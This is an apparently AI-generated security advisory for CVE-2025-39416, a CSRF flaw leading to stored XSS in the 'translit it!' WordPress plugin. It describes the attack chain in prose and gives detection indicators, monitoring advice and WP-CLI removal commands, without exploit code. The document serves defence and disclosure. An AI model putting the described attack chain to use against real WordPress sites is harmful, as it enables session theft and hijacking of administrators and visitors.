CVE-2025-39416 Overview
CVE-2025-39416 is a Cross-Site Request Forgery (CSRF) vulnerability in the Ichi translit it! WordPress plugin (translit-it) that leads to Stored Cross-Site Scripting (XSS). The flaw affects all plugin versions up to and including 1.6. An attacker can craft a malicious page that, when visited by an authenticated administrator, submits a forged request to the plugin and persists attacker-controlled JavaScript in the WordPress database. Subsequent visitors to the affected pages execute the injected script in their browser session.
Critical Impact
A successful attack stores arbitrary JavaScript in the WordPress site, enabling session theft, administrative action hijacking, and malicious redirection of site visitors.
Affected Products
- WordPress plugin: Ichi translit it! (translit-it)
- All versions from n/a through <= 1.6
- WordPress sites with the plugin installed and active
Discovery Timeline
- 2025-04-17 - CVE-2025-39416 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-39416
Vulnerability Analysis
The vulnerability chains two weaknesses: missing CSRF protection [CWE-352] and insufficient output sanitization that allows stored XSS. The plugin exposes a state-changing administrative endpoint that does not validate a WordPress nonce or verify the origin of the request. User-supplied input submitted through that endpoint is persisted without adequate sanitization or contextual output encoding.
Exploitation requires user interaction. An authenticated administrator must visit an attacker-controlled page while logged in to the target WordPress instance. The browser then submits the forged request using the administrator's session cookies, and the malicious payload is saved into plugin settings or content rendered to users. The stored payload executes whenever the affected page is loaded, scoping the attack across users and changing security context.
Root Cause
The root cause is the absence of anti-CSRF tokens on a privileged plugin handler, combined with missing input sanitization and output escaping. WordPress provides wp_nonce_field(), check_admin_referer(), and escaping helpers such as esc_html() and esc_attr(). The plugin fails to enforce these controls on the vulnerable handler through version 1.6.
Attack Vector
The attack is network-based and requires no privileges on the target site, only that a privileged user visit a malicious page. The attacker hosts an HTML page containing an auto-submitting form or fetch request targeting the plugin endpoint. When an authenticated administrator loads that page, the browser issues the cross-site request, and the plugin processes it as a legitimate administrative action. The injected script then persists and runs in the browser of every user who renders the affected output. Refer to the Patchstack Vulnerability Report for additional technical detail.
Detection Methods for CVE-2025-39416
Indicators of Compromise
- Unexpected <script> tags, event handlers (onerror, onload), or obfuscated JavaScript stored in wp_options or post content tied to the translit-it plugin.
- Outbound browser requests from site visitors to unfamiliar domains shortly after page render.
- Administrative configuration changes to the plugin with no corresponding entry in admin activity logs.
Detection Strategies
- Audit the WordPress database for plugin-managed settings containing HTML or JavaScript that should not be present.
- Inspect HTTP access logs for POST requests to plugin admin endpoints with Referer headers pointing to external or unexpected origins.
- Review browser-side Content Security Policy (CSP) violation reports for inline script blocks originating from plugin-rendered pages.
Monitoring Recommendations
- Monitor WordPress administrator sessions for activity originating outside expected IP ranges or user agents.
- Alert on modifications to plugin configuration tables and post metadata associated with translit-it.
- Track file integrity and database changes through a WordPress security plugin or external SIEM ingestion.
How to Mitigate CVE-2025-39416
Immediate Actions Required
- Deactivate and remove the translit it! plugin until a fixed release is verified available from the vendor.
- Force a password reset for all WordPress administrator accounts and invalidate active sessions.
- Scan the database and rendered pages for stored JavaScript and remove any malicious entries.
Patch Information
No fixed version is identified in the available advisory data. Versions through <= 1.6 remain vulnerable. Review the Patchstack Vulnerability Report and the WordPress.org plugin page for an updated release before re-enabling the plugin.
Workarounds
- Restrict access to /wp-admin/ by IP allowlist at the web server or WAF layer to reduce CSRF exposure.
- Deploy a Content Security Policy that disallows inline scripts on public-facing pages to limit stored XSS execution.
- Require administrators to use isolated browser profiles for WordPress administration and avoid browsing untrusted sites in the same session.
# Configuration example: deactivate the vulnerable plugin via WP-CLI
wp plugin deactivate translit-it
wp plugin delete translit-it
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
